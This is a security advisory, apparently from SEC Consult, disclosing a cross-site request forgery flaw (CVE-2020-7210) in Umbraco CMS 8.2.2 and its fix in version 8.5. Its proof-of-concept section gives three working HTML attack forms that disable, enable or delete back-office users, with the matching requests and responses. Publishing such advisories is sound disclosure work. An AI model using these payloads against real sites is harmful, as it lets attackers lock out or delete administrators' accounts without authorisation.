=======================================================================
title: Cross-Site Request Forgery (CSRF)
product: Umbraco CMS
vulnerable version: version 8.2.2
fixed version: version 8.5
CVE number: CVE-2020-7210
impact: medium
homepage: https://umbraco.com/
found: October 2019
by: A. Melnikova (Office Moscow)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Umbraco 8 is the latest version of Umbraco CMS. It’s the fastest and best
version of Umbraco and a big step forward in regard to making your work
with Umbraco simpler; simpler to extend, simpler to edit, simpler to
publish - simpler to use, simpler to enjoy."
Source: https://umbraco.com/products/umbraco-cms/umbraco-8/
Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged to
immediately upgrade to the latest version available.
SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.
Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF)
An attacker can use cross-site request forgery to perform arbitrary web
requests with the identity of the victim, without being noticed by the
victim. This attack always requires some sort of user interaction:
usually the victim needs to click on an attacker-prepared link or visit a
page under the control of the attacker. The back-office user management
endpoints of the tested version accept state-changing POST requests that
carry nothing but the victim's session cookie, i.e. no anti-CSRF token is
validated. An attacker is therefore able to enable, disable or delete
back-office user accounts with the privileges of an authenticated
administrator, which may lead to a denial of service against those user
accounts.
Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF)
In a live attack scenario, the following HTML document would be hosted
on a malicious website, controlled by the attacker.
Example 1: HTML-code for disabling user:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form
action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID>"
method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Request:
--------
POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID> HTTP/1.1
Host: <host-URL>
[...]
Cookie: <ADMIN-COOKIE>
Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 112
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: <ADMIN-COOKIE>
Date: Wed, 06 Nov 2019 10:57:45 GMT
Connection: close
)]}',
{"notifications":[{"header":"<USERNAME> is now disabled","message":"","type":3}],"message":"<USERNAME> is now disabled"}
Example 2: HTML-code for enabling user:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form
action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=<USER-ID>"
method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Request:
--------
POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=<USER-ID> HTTP/1.1
Host: <host-URL>
[...]
Cookie: <ADMIN-COOKIE>
Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 110
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 06 Nov 2019 10:58:12 GMT
Connection: close
)]}',
{"notifications":[{"header":"<USERNAME> is now enabled","message":"","type":3}],"message":"<USERNAME> is now enabled"}
Example 3: HTML-code for deleting user:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form
action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=<USER-ID>"
method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Request:
--------
POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=<USER-ID> HTTP/1.1
Host: <host-URL>
[...]
Cookie: <ADMIN-COOKIE>
Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 114
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: <ADMIN-COOKIE>
Date: Wed, 06 Nov 2019 10:58:36 GMT
Connection: close
)]}',
{"notifications":[{"header":"User <USERNAME> was deleted","message":"","type":3}],"message":"User <USERNAME> was deleted"}
As soon as an authenticated victim (admin) visits a website with this
HTML code embedded, the payload is executed in the context of the
victim's session. Because the endpoints take their parameters from the
query string and a form POST with an empty urlencoded body is a "simple"
cross-origin request, the browser attaches the victim's session cookie and
no CORS preflight takes place. Whether the cookie is attached to such a
cross-site POST also depends on the browser's SameSite handling: browsers
that default cookies without a SameSite attribute to Lax (Chrome from
version 80) generally withhold them from cross-site POSTs, so the attack
is most reliable against browsers that do not apply that default.
Although responses to these requests are not delivered to the attacker,
in many cases it is sufficient to be able to compromise the integrity of
the victim's information stored on the site or to perform certain,
possibly compromising requests to other sites.
Vulnerable / tested versions:
-----------------------------
The following version was tested and found to be vulnerable:
* version 8.2.2
Vendor contact timeline:
------------------------
2019-11-13: Contacting vendor through
2019-11-13: Requesting encryption keys.
2019-11-14: Encryption issues.
2019-11-15: Encryption issues, sending advisory in unencrypted form.
2019-11-25: No response, requesting status update.
2019-11-28: Vendor confirmed vulnerability.
2020-01-03: Confirming the release date.
2020-01-14: Release of updated CMS version 8.5.0.
2020-01-23: Release of security advisory.
Solution:
---------
The vendor provides an updated version which should be installed immediately:
https://our.umbraco.com/download/releases/850
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application
https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices
https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF A. Melnikova / @2020